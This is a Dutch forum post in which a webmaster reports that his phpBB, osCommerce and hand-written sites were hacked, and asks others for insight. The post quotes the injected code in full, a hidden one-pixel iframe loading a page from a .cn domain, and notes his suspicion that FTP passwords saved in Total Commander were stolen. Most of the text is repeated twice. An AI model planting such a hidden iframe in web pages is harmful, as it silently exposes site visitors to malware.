Laat ik beginnen met
Al mijn sites zijn namelijk op (op dit moment) onverklaarbare wijze gehacked.
De volgende regel is bij index.html en index.php gevoegd:
<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola5" width=1 height=1 style="visibility: hidden"></iframe></body></html>
Heeft iemand zoiets eerder gezien?
Heb al druk zitten zoeken, maar niks opgeleverd helaas.
<Edit>
Wat meer info:
De sites worden op diverse plekken gehost. Niet op mijn eigen systemen. Wel heb ik toegang tot deze sites (ftp) en gebruik ik total commander voor het up- en downloaden van bestanden.
Het is phpBB, eigen geschreven html (eenvoudig) en osCommerce.
Ik begin sterk het vermoeden te krijgen dat er vanaf mijn eigen systeem aanpassingen zijn gedaan op de websites.
(helaas heb ik in total commander namelijk ook de wachtwoorden er in opslagen).
Net alle wachtwoorden lopen poetsen en wijzigen. Dus hopelijk komt het niet nog een keer voor. Ook zal ik mijn eigen systeem grondig gaan scannen. Hopelijk hebben jullie nog wat meer inzichten...
Al mijn sites zijn namelijk op (op dit moment) onverklaarbare wijze gehacked.
De volgende regel is bij index.html en index.php gevoegd:
<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola5" width=1 height=1 style="visibility: hidden"></iframe></body></html>
Heeft iemand zoiets eerder gezien?
Heb al druk zitten zoeken, maar niks opgeleverd helaas.
<Edit>
Wat meer info:
De sites worden op diverse plekken gehost. Niet op mijn eigen systemen. Wel heb ik toegang tot deze sites (ftp) en gebruik ik total commander voor het up- en downloaden van bestanden.
Het is phpBB, eigen geschreven html (eenvoudig) en osCommerce.
Ik begin sterk het vermoeden te krijgen dat er vanaf mijn eigen systeem aanpassingen zijn gedaan op de websites.
Net alle wachtwoorden lopen poetsen en wijzigen. Dus hopelijk komt het niet nog een keer voor. Ook zal ik mijn eigen systeem grondig gaan scannen. Hopelijk hebben jullie nog wat meer inzichten...
[ Voor 46% gewijzigd door Redlihcs op 07-01-2009 20:52 ]
Hier had wat zinnigs kunnen staan...